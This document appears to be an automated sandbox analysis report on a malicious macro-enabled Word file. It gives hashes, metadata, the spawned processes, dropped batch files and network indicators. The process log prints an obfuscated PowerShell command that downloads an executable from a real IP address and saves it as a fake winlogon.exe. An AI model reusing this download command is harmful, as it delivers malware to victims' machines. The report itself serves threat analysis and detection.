File name: | declaration_form (1369).docm |
Full analysis: | https://app.any.run/tasks/2a4d679e-36d8-4a14-a841-e8c9345cd76f |
Verdict: | Malicious activity |
Analysis date: | January 17, 2020, 14:07:58 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | B381FFC7CFC9AFBDE8A6F833689AEBD4 |
SHA1: | 168558F539494D67271E9138347EA3F3C9A42A14 |
SHA256: | EEC9FB350BB7F542DD8F070CAB6E8688E9D2EFEAC20AF1D87193FF88DFE6894A |
SSDEEP: | 1536:piUClVlI4yBU8iWJg7SUv8l/tIZoDeLhw5iROLNTH/JFqylKnai4CvqKde2wNHDs:0JvIlhiuIG/iZoK1wLLNo4wdfwdEBxMY |
.docx | | | Word Microsoft Office Open XML Format document (41.2) |
---|---|---|
.zip | | | Open Packaging Conventions container (30.6) |
.ubox | | | Universe Sandbox simulation (21) |
.zip | | | ZIP compressed archive (7) |
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | - |
ZipCompression: | Deflated |
ZipModifyDate: | 2020:01:06 17:18:27 |
ZipCRC: | 0x1ec99838 |
ZipCompressedSize: | 329 |
ZipUncompressedSize: | 713 |
ZipFileName: | docProps/core.xml |
Creator: | Misha |
---|
LastModifiedBy: | user |
---|---|
CreateDate: | 2019:11:01 07:42:00Z |
ModifyDate: | 2020:01:06 14:08:00Z |
RevisionNumber: | 435 |
Application: | Microsoft Office Word |
Template: | Normal.dotm |
TotalEditTime: | 12.7 hours |
Pages: | 1 |
Words: | - |
Characters: | 1 |
DocSecurity: | None |
Lines: | 1 |
Paragraphs: | 1 |
ScaleCrop: | No |
HeadingPairs: |
|
TitlesOfParts: | - |
LinksUpToDate: | No |
CharactersWithSpaces: | 1 |
SharedDoc: | No |
HyperlinksChanged: | No |
AppVersion: | 12 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2300 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\declaration_form (1369).docm" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2420 | cmd /c C:\Users\Public\tmp.bat | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3352 | cmd /c mkdir ""C:\Users\Public\tmpdir"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1772 | cmd /c C:\Users\Public\tmpdir\tmpd.bat | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2580 | powershell -Command ""(New-Object Net.WebClient).DownloadFile('http://104.168.99.30/rSBv1r', 'C:' + '\' + 'U' + 's' + 'er' + 's\P' + 'ub' + 'lic' + '\tm' + 'pdir\wi' + 'nlo' + 'go' + 'n.ex' + 'e') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2300 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA747.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2300 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\538A3092.jpg | — | |
MD5:— | SHA256:— | |||
2580 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SZQSHITKYVJUIUFI88UV.temp | — | |
MD5:— | SHA256:— | |||
2300 | WINWORD.EXE | C:\Users\Public\tmpdir\tmpd.bat | text | |
MD5:DED44253FED387588D28465E984BF876 | SHA256:FBDEBA0901D70C7FABAEEBCA1E3AD9D757548E124B31EFF1A1B2731D00757C33 | |||
2580 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2300 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$claration_form (1369).docm | pgc | |
MD5:4DAD6CA91621D56247DB79B2DB6C2119 | SHA256:421924F76485199AC941E784C29A09907B9322ABD66F538C232E13CEBF6E26D4 | |||
2580 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39b4e3.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2300 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:8B378DCC62035BBABEF8B1C2A131A338 | SHA256:7C1F83E56B3CF1632E1D1DDD8BFD13219F8133599041726FA2EA3FB98B22B275 | |||
2300 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:AC3270E9AA8E19E0FA5E342F05065194 | SHA256:6B3F14ADB4D566AB92EE2E688918914C5EDEAF298494686BCD22828F7193C89C | |||
2300 | WINWORD.EXE | C:\Users\Public\tmp.bat | text | |
MD5:1C1AC5FD1EA331B3C2936416ECE6656E | SHA256:1D032C23D105F8D3C4F8FF2744090DC178FE8AB933FD5CBDEF858ADD8F2F2FED |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2580 | powershell.exe | GET | 302 | 104.168.99.30:80 | http://104.168.99.30/rSBv1r | US | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2580 | powershell.exe | 185.61.154.215:443 | analysprinter.online | Namecheap, Inc. | GB | suspicious |
2580 | powershell.exe | 104.168.99.30:80 | — | ColoCrossing | US | unknown |
Domain | IP | Reputation |
---|---|---|
analysprinter.online |
| suspicious |